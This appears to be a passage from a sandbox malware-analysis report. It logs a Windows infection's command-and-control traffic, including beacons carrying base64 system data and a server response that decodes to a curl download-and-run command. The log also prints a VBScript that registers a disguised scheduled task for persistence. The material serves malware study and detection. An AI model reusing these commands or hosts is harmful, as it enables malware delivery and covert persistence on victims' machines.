                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:43:11.303515911 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:43:11 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                60192.168.2.449876185.215.113.1680
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:43:11.419888973 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:43:12.144037008 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:43:12 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                61192.168.2.449877185.215.113.1680
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:43:12.155832052 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:43:12.889877081 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:43:12 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                62192.168.2.449878185.215.113.1680
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:43:13.014377117 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:43:13.723464966 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:43:13 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                0192.168.2.449739172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:05 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:05 UTC632INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:05 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6fMG%2FDGtxAlx0TaYhQ0e%2F2%2FXDWRwGyTh3fR1G%2F6dUPniigo6bcXQ%2F1wCO%2BC6YQZr0RlyoqEsXL0i474R5FoY0M0yfQdhu%2FZnt4GncfMiicHdzgm%2FOb7qePgtpQgdJurds5q9ClbxQVce"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a051ed842b8-EWR
                                                                                                                                                                2024-09-27 15:42:05 UTC176INData Raw: 61 61 0d 0a 0a 59 32 51 67 4c 32 51 67 4a 58 52 6c 62 58 41 6c 49 43 59 6d 49 47 52 6c 62 43 42 6a 62 32 35 6d 4c 6e 5a 69 63 79 41 79 50 6d 35 31 62 43 41 6d 4a 69 42 6a 64 58 4a 73 49 43 31 76 49 47 4e 76 62 6d 59 75 64 6d 4a 7a 49 47 68 30 64 48 42 7a 4f 69 38 76 5a 57 6c 71 5a 6e 4a 6f 5a 57 64 79 64 47 4a 79 5a 6d 4e 6b 4c 6d 39 75 62 47 6c 75 5a 53 39 6b 62 33 64 75 62 47 39 68 5a 43 39 6a 62 32 35 6d 4d 53 35 77 61 48 41 67 4a 69 59 67 59 33 4e 6a 63 6d 6c 77 64 43 42 6a 62 32 35 6d 4c 6e 5a 69 63 77 3d 3d 0a 0d 0a
                                                                                                                                                                Data Ascii: aaY2QgL2QgJXRlbXAlICYmIGRlbCBjb25mLnZicyAyPm51bCAmJiBjdXJsIC1vIGNvbmYudmJzIGh0dHBzOi8vZWlqZnJoZWdydGJyZmNkLm9ubGluZS9kb3dubG9hZC9jb25mMS5waHAgJiYgY3NjcmlwdCBjb25mLnZicw==
                                                                                                                                                                2024-09-27 15:42:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                1192.168.2.449743172.67.187.1004437276C:\Windows\System32\curl.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:06 UTC104OUTGET /download/conf1.php HTTP/1.1
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                User-Agent: curl/7.83.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                2024-09-27 15:42:07 UTC667INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:07 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EBsFhwgtmmX0SlCfes1jG2Dc%2FPJDECbfKdmbJx%2FYEwahd2cotWjQWt%2FEUCswDEpM9zoQE4JNq3E2UvrMcK5O4om2kabN8fqSxzE5hxsPFAIPQUSdW1cargIYufHw%2B75e1ZH19PD6pr3X"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a0c29dbc325-EWR
                                                                                                                                                                2024-09-27 15:42:07 UTC290INData Raw: 31 31 62 0d 0a 44 69 6d 20 6f 62 6a 53 68 65 6c 6c 0a 53 65 74 20 6f 62 6a 53 68 65 6c 6c 20 3d 20 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 0a 0a 44 69 6d 20 63 6f 6d 6d 61 6e 64 0a 63 6f 6d 6d 61 6e 64 20 3d 20 22 73 63 68 74 61 73 6b 73 20 2f 63 72 65 61 74 65 20 2f 74 6e 20 22 22 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 22 22 20 2f 74 72 20 22 22 22 20 26 20 6f 62 6a 53 68 65 6c 6c 2e 45 78 70 61 6e 64 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 74 72 69 6e 67 73 28 22 25 74 65 6d 70 25 22 29 20 26 20 22 5c 4d 69 63 72 6f 73 6f 66 74 2d 45 64 67 65 2e 65 78 65 22 22 20 2f 73 63 20 6f 6e 6c 6f 67 6f 6e 20 2f 72 6c 20 68 69 67 68 65 73 74 20 2f 66 22 0a 0a 6f 62 6a 53 68 65 6c 6c 2e 52 75 6e 20 63 6f 6d 6d 61 6e 64
                                                                                                                                                                Data Ascii: 11bDim objShellSet objShell = CreateObject("WScript.Shell")Dim commandcommand = "schtasks /create /tn ""Microsoft Edge"" /tr """ & objShell.ExpandEnvironmentStrings("%temp%") & "\Microsoft-Edge.exe"" /sc onlogon /rl highest /f"objShell.Run command
                                                                                                                                                                2024-09-27 15:42:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                2192.168.2.449745172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:08 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:09 UTC626INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:08 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=unOH4EbE3TFmjw%2B3pYYBVv8LZfdcjO2zKYSFXW8DVXV68laPhVWQSRBeIanmUMecYATIeSuxI%2Fd9%2FMjo%2FniA%2BAqHNRuUXpkYE1DBCiK8UouYJ2imWS51O551yc4xwxBAmhfzYrwfRJTI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a184a47432b-EWR
                                                                                                                                                                2024-09-27 15:42:09 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                3192.168.2.449747172.67.187.1004437636C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:09 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:09 UTC628INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:09 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qRuJH0cGoQQ6wfwLbWpDZcYtUA%2Bg6CjFrqi0p2VsnUGiusv7VueJJXzi%2BVsIMptbCqSdQYR6AL%2F8u%2BzwIoCRkbebyeFLrhQY8MV%2F4VnRaXmDLebmxR1JR%2BSKUw2feNkG96Uoj4LmCekJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a1d09517c78-EWR
                                                                                                                                                                2024-09-27 15:42:09 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                4192.168.2.449748172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:09 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:10 UTC622INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:10 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7LrdrsqxykRBHWj3sCjinrVfuHFoXw7wW3YgTi3ic3TB1YWvTLCJM4xXCzdk3r9kmq4UuLwV1pluzN%2FInd6XVeKcTKQ%2F%2Fg4WXwH24si9bHvVdl4kXgrVMKYPm7ODYjXOsRd3XNRMuP8Y"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a204c0a4399-EWR
                                                                                                                                                                2024-09-27 15:42:10 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                5192.168.2.449750172.67.187.1004437636C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:11 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:11 UTC626INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:11 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a%2FPpckVTTOnBjHvV3mJC2z%2FMBJSFb9kvoAFgr%2BblNstZarw4OHTmoUfuSVP8Gyv7YM1QPiW0c9zX%2F5k2b3HghZus5h3kOSjQt5a8Oq8DHlVKU%2FLHtmv3VjLX5RxxHrzslGEWftn1cWkS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a27cd7d439a-EWR
                                                                                                                                                                2024-09-27 15:42:11 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                6192.168.2.449751172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:11 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:11 UTC620INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:11 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cae6GnVlSMLYc%2BiYm1UDP1ImO3tHteRWe8xkxBxy8zzZwbPSJmtiIszniKXgfPVO7iTZ8vj8oFr%2BiYsmT81pFEfQa0SgYYQfbumIy8g1Q0TGzJOuCzZlZOEQi8Z3n1VvZgUfJZEFrqJk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a27cfe98c89-EWR
                                                                                                                                                                2024-09-27 15:42:11 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                7192.168.2.449754172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:12 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:12 UTC660INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:12 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JgqjbtqWuOgqtOJHAk%2BHGmTaWZ%2Fjk4UKxvvCbL8SDLQeEoavRmyRAtW8tn8Ot%2F6Szxz%2BygX60MrFEyzmj0%2FxXUaTt4Dmq71hY%2Fe5VaADZLaem%2FOv0HnJpErH9NTwNI9AY3bfmZOV7nAA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a2fd9434223-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                2024-09-27 15:42:12 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:12 UTC5INData Raw: 30 0d 0a 0d 0a
